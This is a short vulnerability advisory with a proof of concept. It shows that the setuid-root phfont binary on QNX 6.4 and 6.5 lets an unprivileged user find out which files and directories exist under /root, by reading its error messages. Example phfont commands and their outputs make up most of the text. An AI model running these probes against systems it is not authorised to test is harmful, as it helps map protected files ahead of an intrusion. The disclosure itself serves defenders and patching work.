QNX 6.x phfont Enumeration

`#  
# QNX 6.x phfont file and directory enumeration vulnerability by cenobyte 2014  
# <[email protected]>  
#  
# - vulnerability description:  
# QNX setuid root /usr/photon/bin/phfont allows any non-root user to enumerate  
# files and directories as root due to PfAttachLocalDllArgv() error messages.  
#  
# You can discover files and directories by observing the following error  
# messages and behaviour:  
#  
# 1) PfAttachLocalDllArgv(): Function not implemented  
# A file exists.  
# 2) PfAttachLocalDllArgv(): No such file or directory  
# A directory does not exist.  
# 3) And nothing will be returned when a directory exists.  
#  
# - vulnerable platforms:  
# QNX 6.5.0SP1  
# QNX 6.5.0  
# QNX 6.4.0  
#  
# - not vulnerable:  
# QNX 6.3.0  
  
$ id  
uid=100(user) gid=100  
  
$ /usr/photon/bin/phfont -A -d /root/.ph  
$ /usr/photon/bin/phfont -A -d /root/doesnotexist  
$ PfAttachLocalDllArgv(): No such file or directory  
  
$ /usr/photon/bin/phfont -A -d /root/.profile  
$ PfAttachLocalDllArgv(): Function not implemented  
  
# ls -l /root  
total 13  
drwx------ 5 root root 1024 Jan 07 16:24 .  
drwxr-xr-x 16 root root 1024 Oct 09 15:03 ..  
-rw-rw-r-- 1 root root 51 Jan 24 01:15 .lastlogin  
drwx------ 3 root root 1024 Sep 26 18:03 .mozilla  
drwxrwxr-x 3 root root 1024 Sep 27 15:36 .ph  
-rw-r--r-- 1 root root 191 Apr 20 2001 .profile  
drwx------ 2 root root 1024 Sep 26 18:11 .ssh  
`